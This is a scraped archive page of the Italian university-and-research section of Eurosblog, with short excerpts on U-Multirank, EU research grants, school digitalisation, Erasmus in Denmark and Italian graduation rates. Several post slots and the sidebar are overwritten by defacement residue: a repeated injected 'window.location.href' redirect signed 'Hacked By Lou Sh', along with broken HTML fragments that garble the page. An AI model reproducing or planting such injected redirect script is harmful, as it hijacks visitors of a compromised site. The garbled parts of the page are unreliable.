EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Ricerca ed Università

it

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

it

U-Multirank è l’innovativo sistema europeo che valuta le università con lo scopo non solo di offrire una classifica sempre aggiornata degli atenei, ma li esamina secondo determinati parametri. U-Multirank, progetto sostenuto dall’Ue attraverso 2 milioni di euro con una scadenza prevista per il 2015, consente di realizzare ricerche personalizzate a seconda delle esigenze informative di ogni utente e si focalizza sui pro e contro degli istituti di formazione.

Per il 2014, secondo il sito U-Multirank, solamente il 12% degli atenei analizzati offre un servizio idoneo classificabile come “Very Good”. In vetta alla classifica compare per l’Italia il Politecnico di Torino insieme all’MIT, Harvard e Berkeley.

Ma come si utilizza il sito? Si parte con delle (...)

it

Il 14 gennaio 2014 il Parlamento europeo ha reso noto, attraverso un comunicato, il finanziamento di importanti progetti di ricerca. In un momento in cui il progresso scientifico è minato dalle politiche di austerity che molti Stati europei stanno adottando per fronteggiare la crisi, l’UE sceglie di schierarsi al fianco dei ricercatori, stanziando a loro favore un totale di 575 milioni di euro, con un contributo medio assegnato di 1.84 milioni di euro fino a un massimo di 2.75 milioni di euro.

Nell’ ambito della prima competizione Consolidator Grant (un bando di concorso per l’assegnazione di fondi riservato a ricercatori con un ampio bagaglio di esperienza), il Consiglio Europeo della ricerca ha selezionato le proposte di 312 scienziati, i quali potranno continuare e migliorare i loro (...)

it

Quella in cui viviamo tutti i giorni è una società interconnessa, in cui sempre più persone, di qualunque fascia di età, si avvalgono dell’uso di tecnologie. Tuttavia, soprattutto per i più piccoli, è evidente come il mondo scolastico non rifletta esattamente questa realtà.

Nei paesi dell’UE oltre il 60% dei bambini frequentano scuole e istituti non ancora dotati di tecnologia digitale. La scuola non fornisce sistemi di lettura digitale, software di esercizi, simulazioni o giochi didattici. Soltanto la metà dei giovani di 16 anni frequenta ‘istituti digitalizzati’ e (...)

it

Raramente ci si annoia durante le lezioni in Danimarca. Puoi lavorare a maglia o preparare una spremuta d'arancia. L'importante è garantire il 75% delle presenze e saper fare più attività insieme. Una delle quali quasi obbligatoria: partecipare in aula. Niente di strano se lo si fa sferruzzando un cappellino!

Continuamente stimolati alla discussione, capita spesso che gli studenti danesi a lezione parlino più dell’insegnante. Abituati agli interventi in pubblico e ai lavori di gruppo, interagiscono disinvolti tra loro e con i docenti mantenendo dinamico l’apprendimento e alto il livello di (...)

it

La partenza e l'arrivo: il primo impatto con un'avventura chiamata Erasmus.

Il mio primo giorno in Danimarca lo ricordo seduta su una panchina mangiando insalata. Niente di meno indicato per il pranzo al sacco in una domenica danese di fine gennaio. Aveva nevicato tutto il giorno, continuava a nevicare sulla mia insalata e avrebbe proseguito per i due mesi successivi. (...)

it

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

it

In seguito ai crescenti problemi di sicurezza rispetto al traffico illecito di materiali radioattivi nucleari, il Centro Comune di Ricerca è stato incaricato dalla Commissione europea di istituire un apposito istituto di sicurezza nucleare.

La preoccupazione per la sicurezza dei materiali nucleari e radioattivi, in aggiunta alla crescente preoccupazione per minacce terroristiche, è uno dei temi principali per l’Unione Europea e non solo.

La formazione, come confermato anche dal piano d’azione CBRN (il settore chimico, biologico, (...)

it

Il prontuario soprannominato “Un E-book per l’Europa” nasce in forma digitale per far conoscere in maniera adeguata l’Europa nelle scuole. I temi che più interessano il manuale sono in particolare euro e governance europea, la storia dell’integrazione europea, l’istituzione dell’Ue successiva al Trattato di Lisbona, lo sviluppo sostenibile, il ruolo che l’Ue ricopre a livello internazionale e infine i diritti e la cittadinanza europea.

Il progetto è sostenuto e propugnato dalle maggiori istituzioni presenti nel nostro paese e in Europa tra le quali vanno ricordate l’Università di Genova, il Centro in Europa e l’associazione Clio ’92 in collaborazione con il programma Jean Monnet che si focalizza sulla comprensione costante (...)

it

Ancora una volta l'Italia dimostra di non reggere il passo con gli altri paesi europei, i dati Eurostat parlano chiaro: solo il 21% di italiani iscritti all'università si laurea entro i 34 anni; il 26% delle donne e il 17% degli uomini. I dati ci rilegano in fondo alla classifica, superati anche dalla Romania, ex maglia nera nel 2010, oggi con il 21,8%.

Sono questi i dati che ci rilegano in fondo alla classifica, superati anche dalla Romania, ex maglia nera nel 2010, oggi con il 21,8%.

L’ Italia nettamente fuori media UE, non è altro che l’esito preoccupante di un paese in cui le cose sono andate sempre peggiorando, non riuscendo mai a volgere (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France